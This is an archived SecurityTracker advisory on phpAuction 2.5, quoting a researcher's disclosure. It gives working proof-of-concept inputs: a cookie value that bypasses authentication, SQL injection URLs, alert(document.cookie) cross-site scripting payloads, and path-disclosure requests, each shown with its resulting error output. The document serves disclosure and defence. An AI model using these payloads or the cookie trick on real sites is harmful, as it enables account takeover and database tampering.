SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PhpAuction Vendors:   Phpauction.org
phpAuction Bugs Let Remote Users Conduct Cross-Site Scripting and SQL Injection Attacks and Bypass Authentication
SecurityTracker Alert ID:  1014423
SecurityTracker URL:  http://securitytracker.com/id/1014423
CVE Reference:   CVE-2005-2252, CVE-2005-2253, CVE-2005-2254, CVE-2005-2255   (Links to External Site)
Updated:  Jun 16 2008
Original Entry Date:  Jul 8 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Diabolic Crab reported several vulnerabilities in phpAuction. A remote user can bypass authentication to access a target user's account. A remote user can conduct cross-site scripting attacks and inject SQL commands. A remote user can also determine the installation path.

A remote user can set the 'PHPAUCTION_RM_ID' cookie value to the ID number of the target user to bypass authentication and gain access to a target user's account.

The 'adsearch.php' script does not properly validate user-supplied input in the 'category' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION
&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on
&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends
&type=2&action=search&go=GO%20%3E%3E

The 'id' parameter of 'viewnews.php' is also affected.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vulnerable software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159

/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>

/login.php?username=<script>alert(document.cookie)</script>

/viewnews.php?id=<script>alert(document.cookie)</script>

A remote user can supply the following type of URLs to cause the system to disclose the installation path.

/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here

/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpAuction software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can determine the installation path.

A remote user can bypass authentication.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpauction.org/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql injection, Cross Site Scripting and File Include vulnerabilities


Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
 
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND 
EMAILS TO DCRAB@HACKERSCENTER.COM
******************************
 
Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code 
them. Learn more at http://www.dbtech.org
 
Severity: High
Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql injection, 
Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
 
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are, Authentication Bypass, Multiple Sql injection, Cross Site 
Scripting and File Include vulnerabilities in PhpAuction.
 

Proof of Concept Exploits:
 
Authentication bypass
Set the cookie as follows,
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersinate (you can get it from thier 
profile)
Access the website, and you'r instantly logged in as them ;)
 
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION
&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on
&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends
&type=2&action=search&go=GO%20%3E%3E
 
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource 
in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/adsearch.php 
on line 33
 
/viewnews.php?id='SQL_INJECTION
Error: select * from PROSITE_news where id=\'SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL 
server version for the right syntax to use near '\'SQL_INJECTION' at line 1
 
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159
Cross Site Scripting
 
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/login.php?username=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/viewnews.php?id=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here
 
Warning: 
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): 
failed to open stream: No such file or directory in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 
Fatal error: main(): Failed opening required 
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' 
(include_path='.:/usr/local/lib/php') in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 

/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
 
Warning: 
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): 
failed to open stream: No such file or directory in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 
Fatal error: main(): Failed opening required 
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' 
(include_path='.:/usr/local/lib/php') in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at 
http://www.hackerscenter.com
 
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me 
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or 
http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with 
php.
 
 

Sincerely,
Diabolic Crab
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC